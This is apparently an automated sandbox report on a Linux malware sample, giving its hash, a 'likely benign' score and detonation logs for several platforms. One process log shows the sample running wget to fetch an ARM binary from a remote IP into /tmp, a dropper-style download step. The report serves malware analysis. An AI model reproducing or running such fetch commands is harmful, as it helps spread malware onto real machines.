Malware Analysis Report

2024-10-10 11:58

Sample ID 240614-jp55ya1cpf
Target a89afadb25913b96ff06076df2c883f7_JaffaCakes118
SHA256 de4b5aaccb0b38bf47a910616e5f5f47b9d34078958c3cfcbc03809e26903c4f
Tags
score
3/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
3/10

SHA256

de4b5aaccb0b38bf47a910616e5f5f47b9d34078958c3cfcbc03809e26903c4f

Threat Level: Likely benign

The file a89afadb25913b96ff06076df2c883f7_JaffaCakes118 was found to be: Likely benign.

Malicious Activity Summary


Writes file to tmp directory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-14 07:51

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-14 07:51

Reported

2024-06-14 07:51

Platform

debian9-mipsbe-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-14 07:51

Reported

2024-06-14 07:51

Platform

debian9-mipsel-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 07:51

Reported

2024-06-14 07:54

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

131s

Max time network

150s

Command Line

[/tmp/a89afadb25913b96ff06076df2c883f7_JaffaCakes118]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.nttpd-z /usr/bin/wget N/A

Processes

/tmp/a89afadb25913b96ff06076df2c883f7_JaffaCakes118

[/tmp/a89afadb25913b96ff06076df2c883f7_JaffaCakes118]

/bin/rm

[rm -f .nttpd-z]

/usr/bin/wget

[wget -O .nttpd-z http://188.92.72.129/.nttpd,3-arm-le-t1-z]

Network

Country Destination Domain Proto
LV 188.92.72.129:80 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.8:443 tcp
LV 188.92.72.129:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 07:51

Reported

2024-06-14 07:54

Platform

debian9-armhf-20240611-en

Max time network

151s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
LV 188.92.72.129:80 tcp
LV 188.92.72.129:80 tcp

Files

N/A